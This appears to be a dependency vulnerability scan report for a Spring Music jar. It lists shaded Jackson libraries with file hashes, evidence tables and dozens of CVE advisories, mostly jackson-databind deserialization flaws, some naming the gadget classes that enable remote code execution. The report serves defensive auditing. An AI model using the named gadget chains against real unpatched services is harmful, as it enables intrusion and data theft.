spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar (shaded: com.fasterxml.jackson.core:jackson-annotations:2.3.0)
Description: Core annotations used for value types, used by Jackson data binding package.
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar/META-INF/maven/com.fasterxml.jackson.core/jackson-annotations/pom.xml
MD5: 920a7c797babb215595b83388a2cab1a
SHA1: bf2a064aec0f86ef110ded6b11147350cfef0bb7
SHA256: 4a51ac0c3696f8974d8dde4e6d464e8d03d5a919eb6d365ca6b410e1f6a7cf6c
Evidence Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | jackson-annotations | Low
Vendor | pom | groupid | com.fasterxml.jackson.core | Highest
Vendor | pom | name | Jackson-annotations | High
Vendor | pom | parent-artifactid | oss-parent | Low
Vendor | pom | parent-groupid | com.fasterxml | Medium
Vendor | pom | url | http://wiki.fasterxml.com/JacksonHome | Highest
Product | hint analyzer | product | java8 | Highest
Product | hint analyzer | product | modules | Highest
Product | pom | artifactid | jackson-annotations | Highest
Product | pom | groupid | com.fasterxml.jackson.core | Highest
Product | pom | name | Jackson-annotations | High
Product | pom | parent-artifactid | oss-parent | Medium
Product | pom | parent-groupid | com.fasterxml | Medium
Product | pom | url | http://wiki.fasterxml.com/JacksonHome | Medium
Version | pom | parent-version | 2.3.0 | Low
Version | pom | version | 2.3.0 | Highest
CVE-2018-1000873
FasterXML Jackson versions before 2.9.8 contain a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in a denial-of-service (DoS). The attack appears to be exploitable when the victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
Note: this match is driven by the hint analyzer evidence above (product "java8" and "modules"), which associates this artifact with the jackson-modules-java8 product. The affected code is the java.time (JSR-310) datatype module, not jackson-annotations itself, so confirm that module is actually present in the shaded connector before treating this as a true positive; the same match is reported below for the shaded jackson-core.
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar (shaded: com.fasterxml.jackson.core:jackson-core:2.3.3)
Description: Core Jackson abstractions, basic JSON streaming API implementation
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar/META-INF/maven/com.fasterxml.jackson.core/jackson-core/pom.xml
MD5: 57bca813b5307e3154e7d8eeddb5c156
SHA1: fc05676963f49f5c338cdc115b4ff74dfe041c4f
SHA256: e8135af60a414a92b4d8d647e0487d1d728d74987fd65b4c33fce7fe09052488
Evidence Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | jackson-core | Low
Vendor | pom | groupid | com.fasterxml.jackson.core | Highest
Vendor | pom | name | Jackson-core | High
Vendor | pom | parent-artifactid | oss-parent | Low
Vendor | pom | parent-groupid | com.fasterxml | Medium
Vendor | pom | url | http://wiki.fasterxml.com/JacksonHome | Highest
Product | hint analyzer | product | java8 | Highest
Product | hint analyzer | product | modules | Highest
Product | pom | artifactid | jackson-core | Highest
Product | pom | groupid | com.fasterxml.jackson.core | Highest
Product | pom | name | Jackson-core | High
Product | pom | parent-artifactid | oss-parent | Medium
Product | pom | parent-groupid | com.fasterxml | Medium
Product | pom | url | http://wiki.fasterxml.com/JacksonHome | Medium
Version | pom | parent-version | 2.3.3 | Low
Version | pom | version | 2.3.3 | Highest
CVE-2018-1000873
FasterXML Jackson versions before 2.9.8 contain a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in a denial-of-service (DoS). The attack appears to be exploitable when the victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar (shaded: com.fasterxml.jackson.core:jackson-databind:2.3.3)
Description: General data-binding functionality for Jackson: works on core streaming API
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar/META-INF/maven/com.fasterxml.jackson.core/jackson-databind/pom.xml
MD5: 04e23f17a1150e7ec1f70eeac734af7d
SHA1: fc2fa919676ab9574a7e312fd44741e5569b86a1
SHA256: 711e6ba52cbad60347308ff19e464851c2aca09ec50b2a411b14d06d8df9ee84
Evidence Type | Source | Name | Value | Confidence
Vendor | pom | artifactid | jackson-databind | Low
Vendor | pom | groupid | com.fasterxml.jackson.core | Highest
Vendor | pom | name | jackson-databind | High
Vendor | pom | parent-artifactid | oss-parent | Low
Vendor | pom | parent-groupid | com.fasterxml | Medium
Vendor | pom | url | http://wiki.fasterxml.com/JacksonHome | Highest
Product | hint analyzer | product | java8 | Highest
Product | hint analyzer | product | modules | Highest
Product | pom | artifactid | jackson-databind | Highest
Product | pom | groupid | com.fasterxml.jackson.core | Highest
Product | pom | name | jackson-databind | High
Product | pom | parent-artifactid | oss-parent | Medium
Product | pom | parent-groupid | com.fasterxml | Medium
Product | pom | url | http://wiki.fasterxml.com/JacksonHome | Medium
Version | pom | parent-version | 2.3.3 | Low
Version | pom | version | 2.3.3 | Highest
CVE-2017-15095
A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2017-17485
FasterXML jackson-databind through 2.8.10 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2017-7525
A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
OSSINDEX - [CVE-2017-7525] CWE-184: Incomplete Blacklist
OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7525
OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution
OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist
OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7525
OSSIndex - https://github.com/FasterXML/jackson-databind/issues/1599
Vulnerable Software & Versions:
CVE-2018-11307
An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2018-14718
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2018-14719
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2018-7489
FasterXML jackson-databind before 2.7.9.3, 2.8.x before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-14379
SubTypeValidator.java in FasterXML jackson-databind before 2.9.9.2 mishandles default typing when ehcache is used (because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup), leading to remote code execution. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-14540
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-14892
A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code. CWE-502 Deserialization of Untrusted Data, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-16335
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-16942
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-16943
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-17267
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2019-17531
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2019-20330
FasterXML jackson-databind 2.x before 2.9.10.2 lacks certain net.sf.ehcache blocking. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2020-8840
FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
CVE-2020-9547
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-9548
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-10673
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). CWE-502 Deserialization of Untrusted Data, NVD-CWE-Other
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2018-5968
FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist. CWE-502 Deserialization of Untrusted Data, CWE-184 Incomplete List of Disallowed Inputs
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-10650
A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
References:
CVE-2020-24616
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP). CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-24750
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-35490
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-35491
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36179
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36180
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36181
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36182
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36183
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36184
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36185
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36186
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36187
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36188
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2020-36189
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P
References:
CVE-2021-20190
A flaw was found in jackson-databind before 2.9.10.7. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: HIGH (8.3) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:C
References:
Vulnerable Software & Versions:
CVE-2018-12022
An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Jodd-db jar (for database access for the Jodd framework) in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-12086
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-14439
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. CWE-502 Deserialization of Untrusted Data
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2020-36518
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CWE-787 Out-of-bounds Write
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
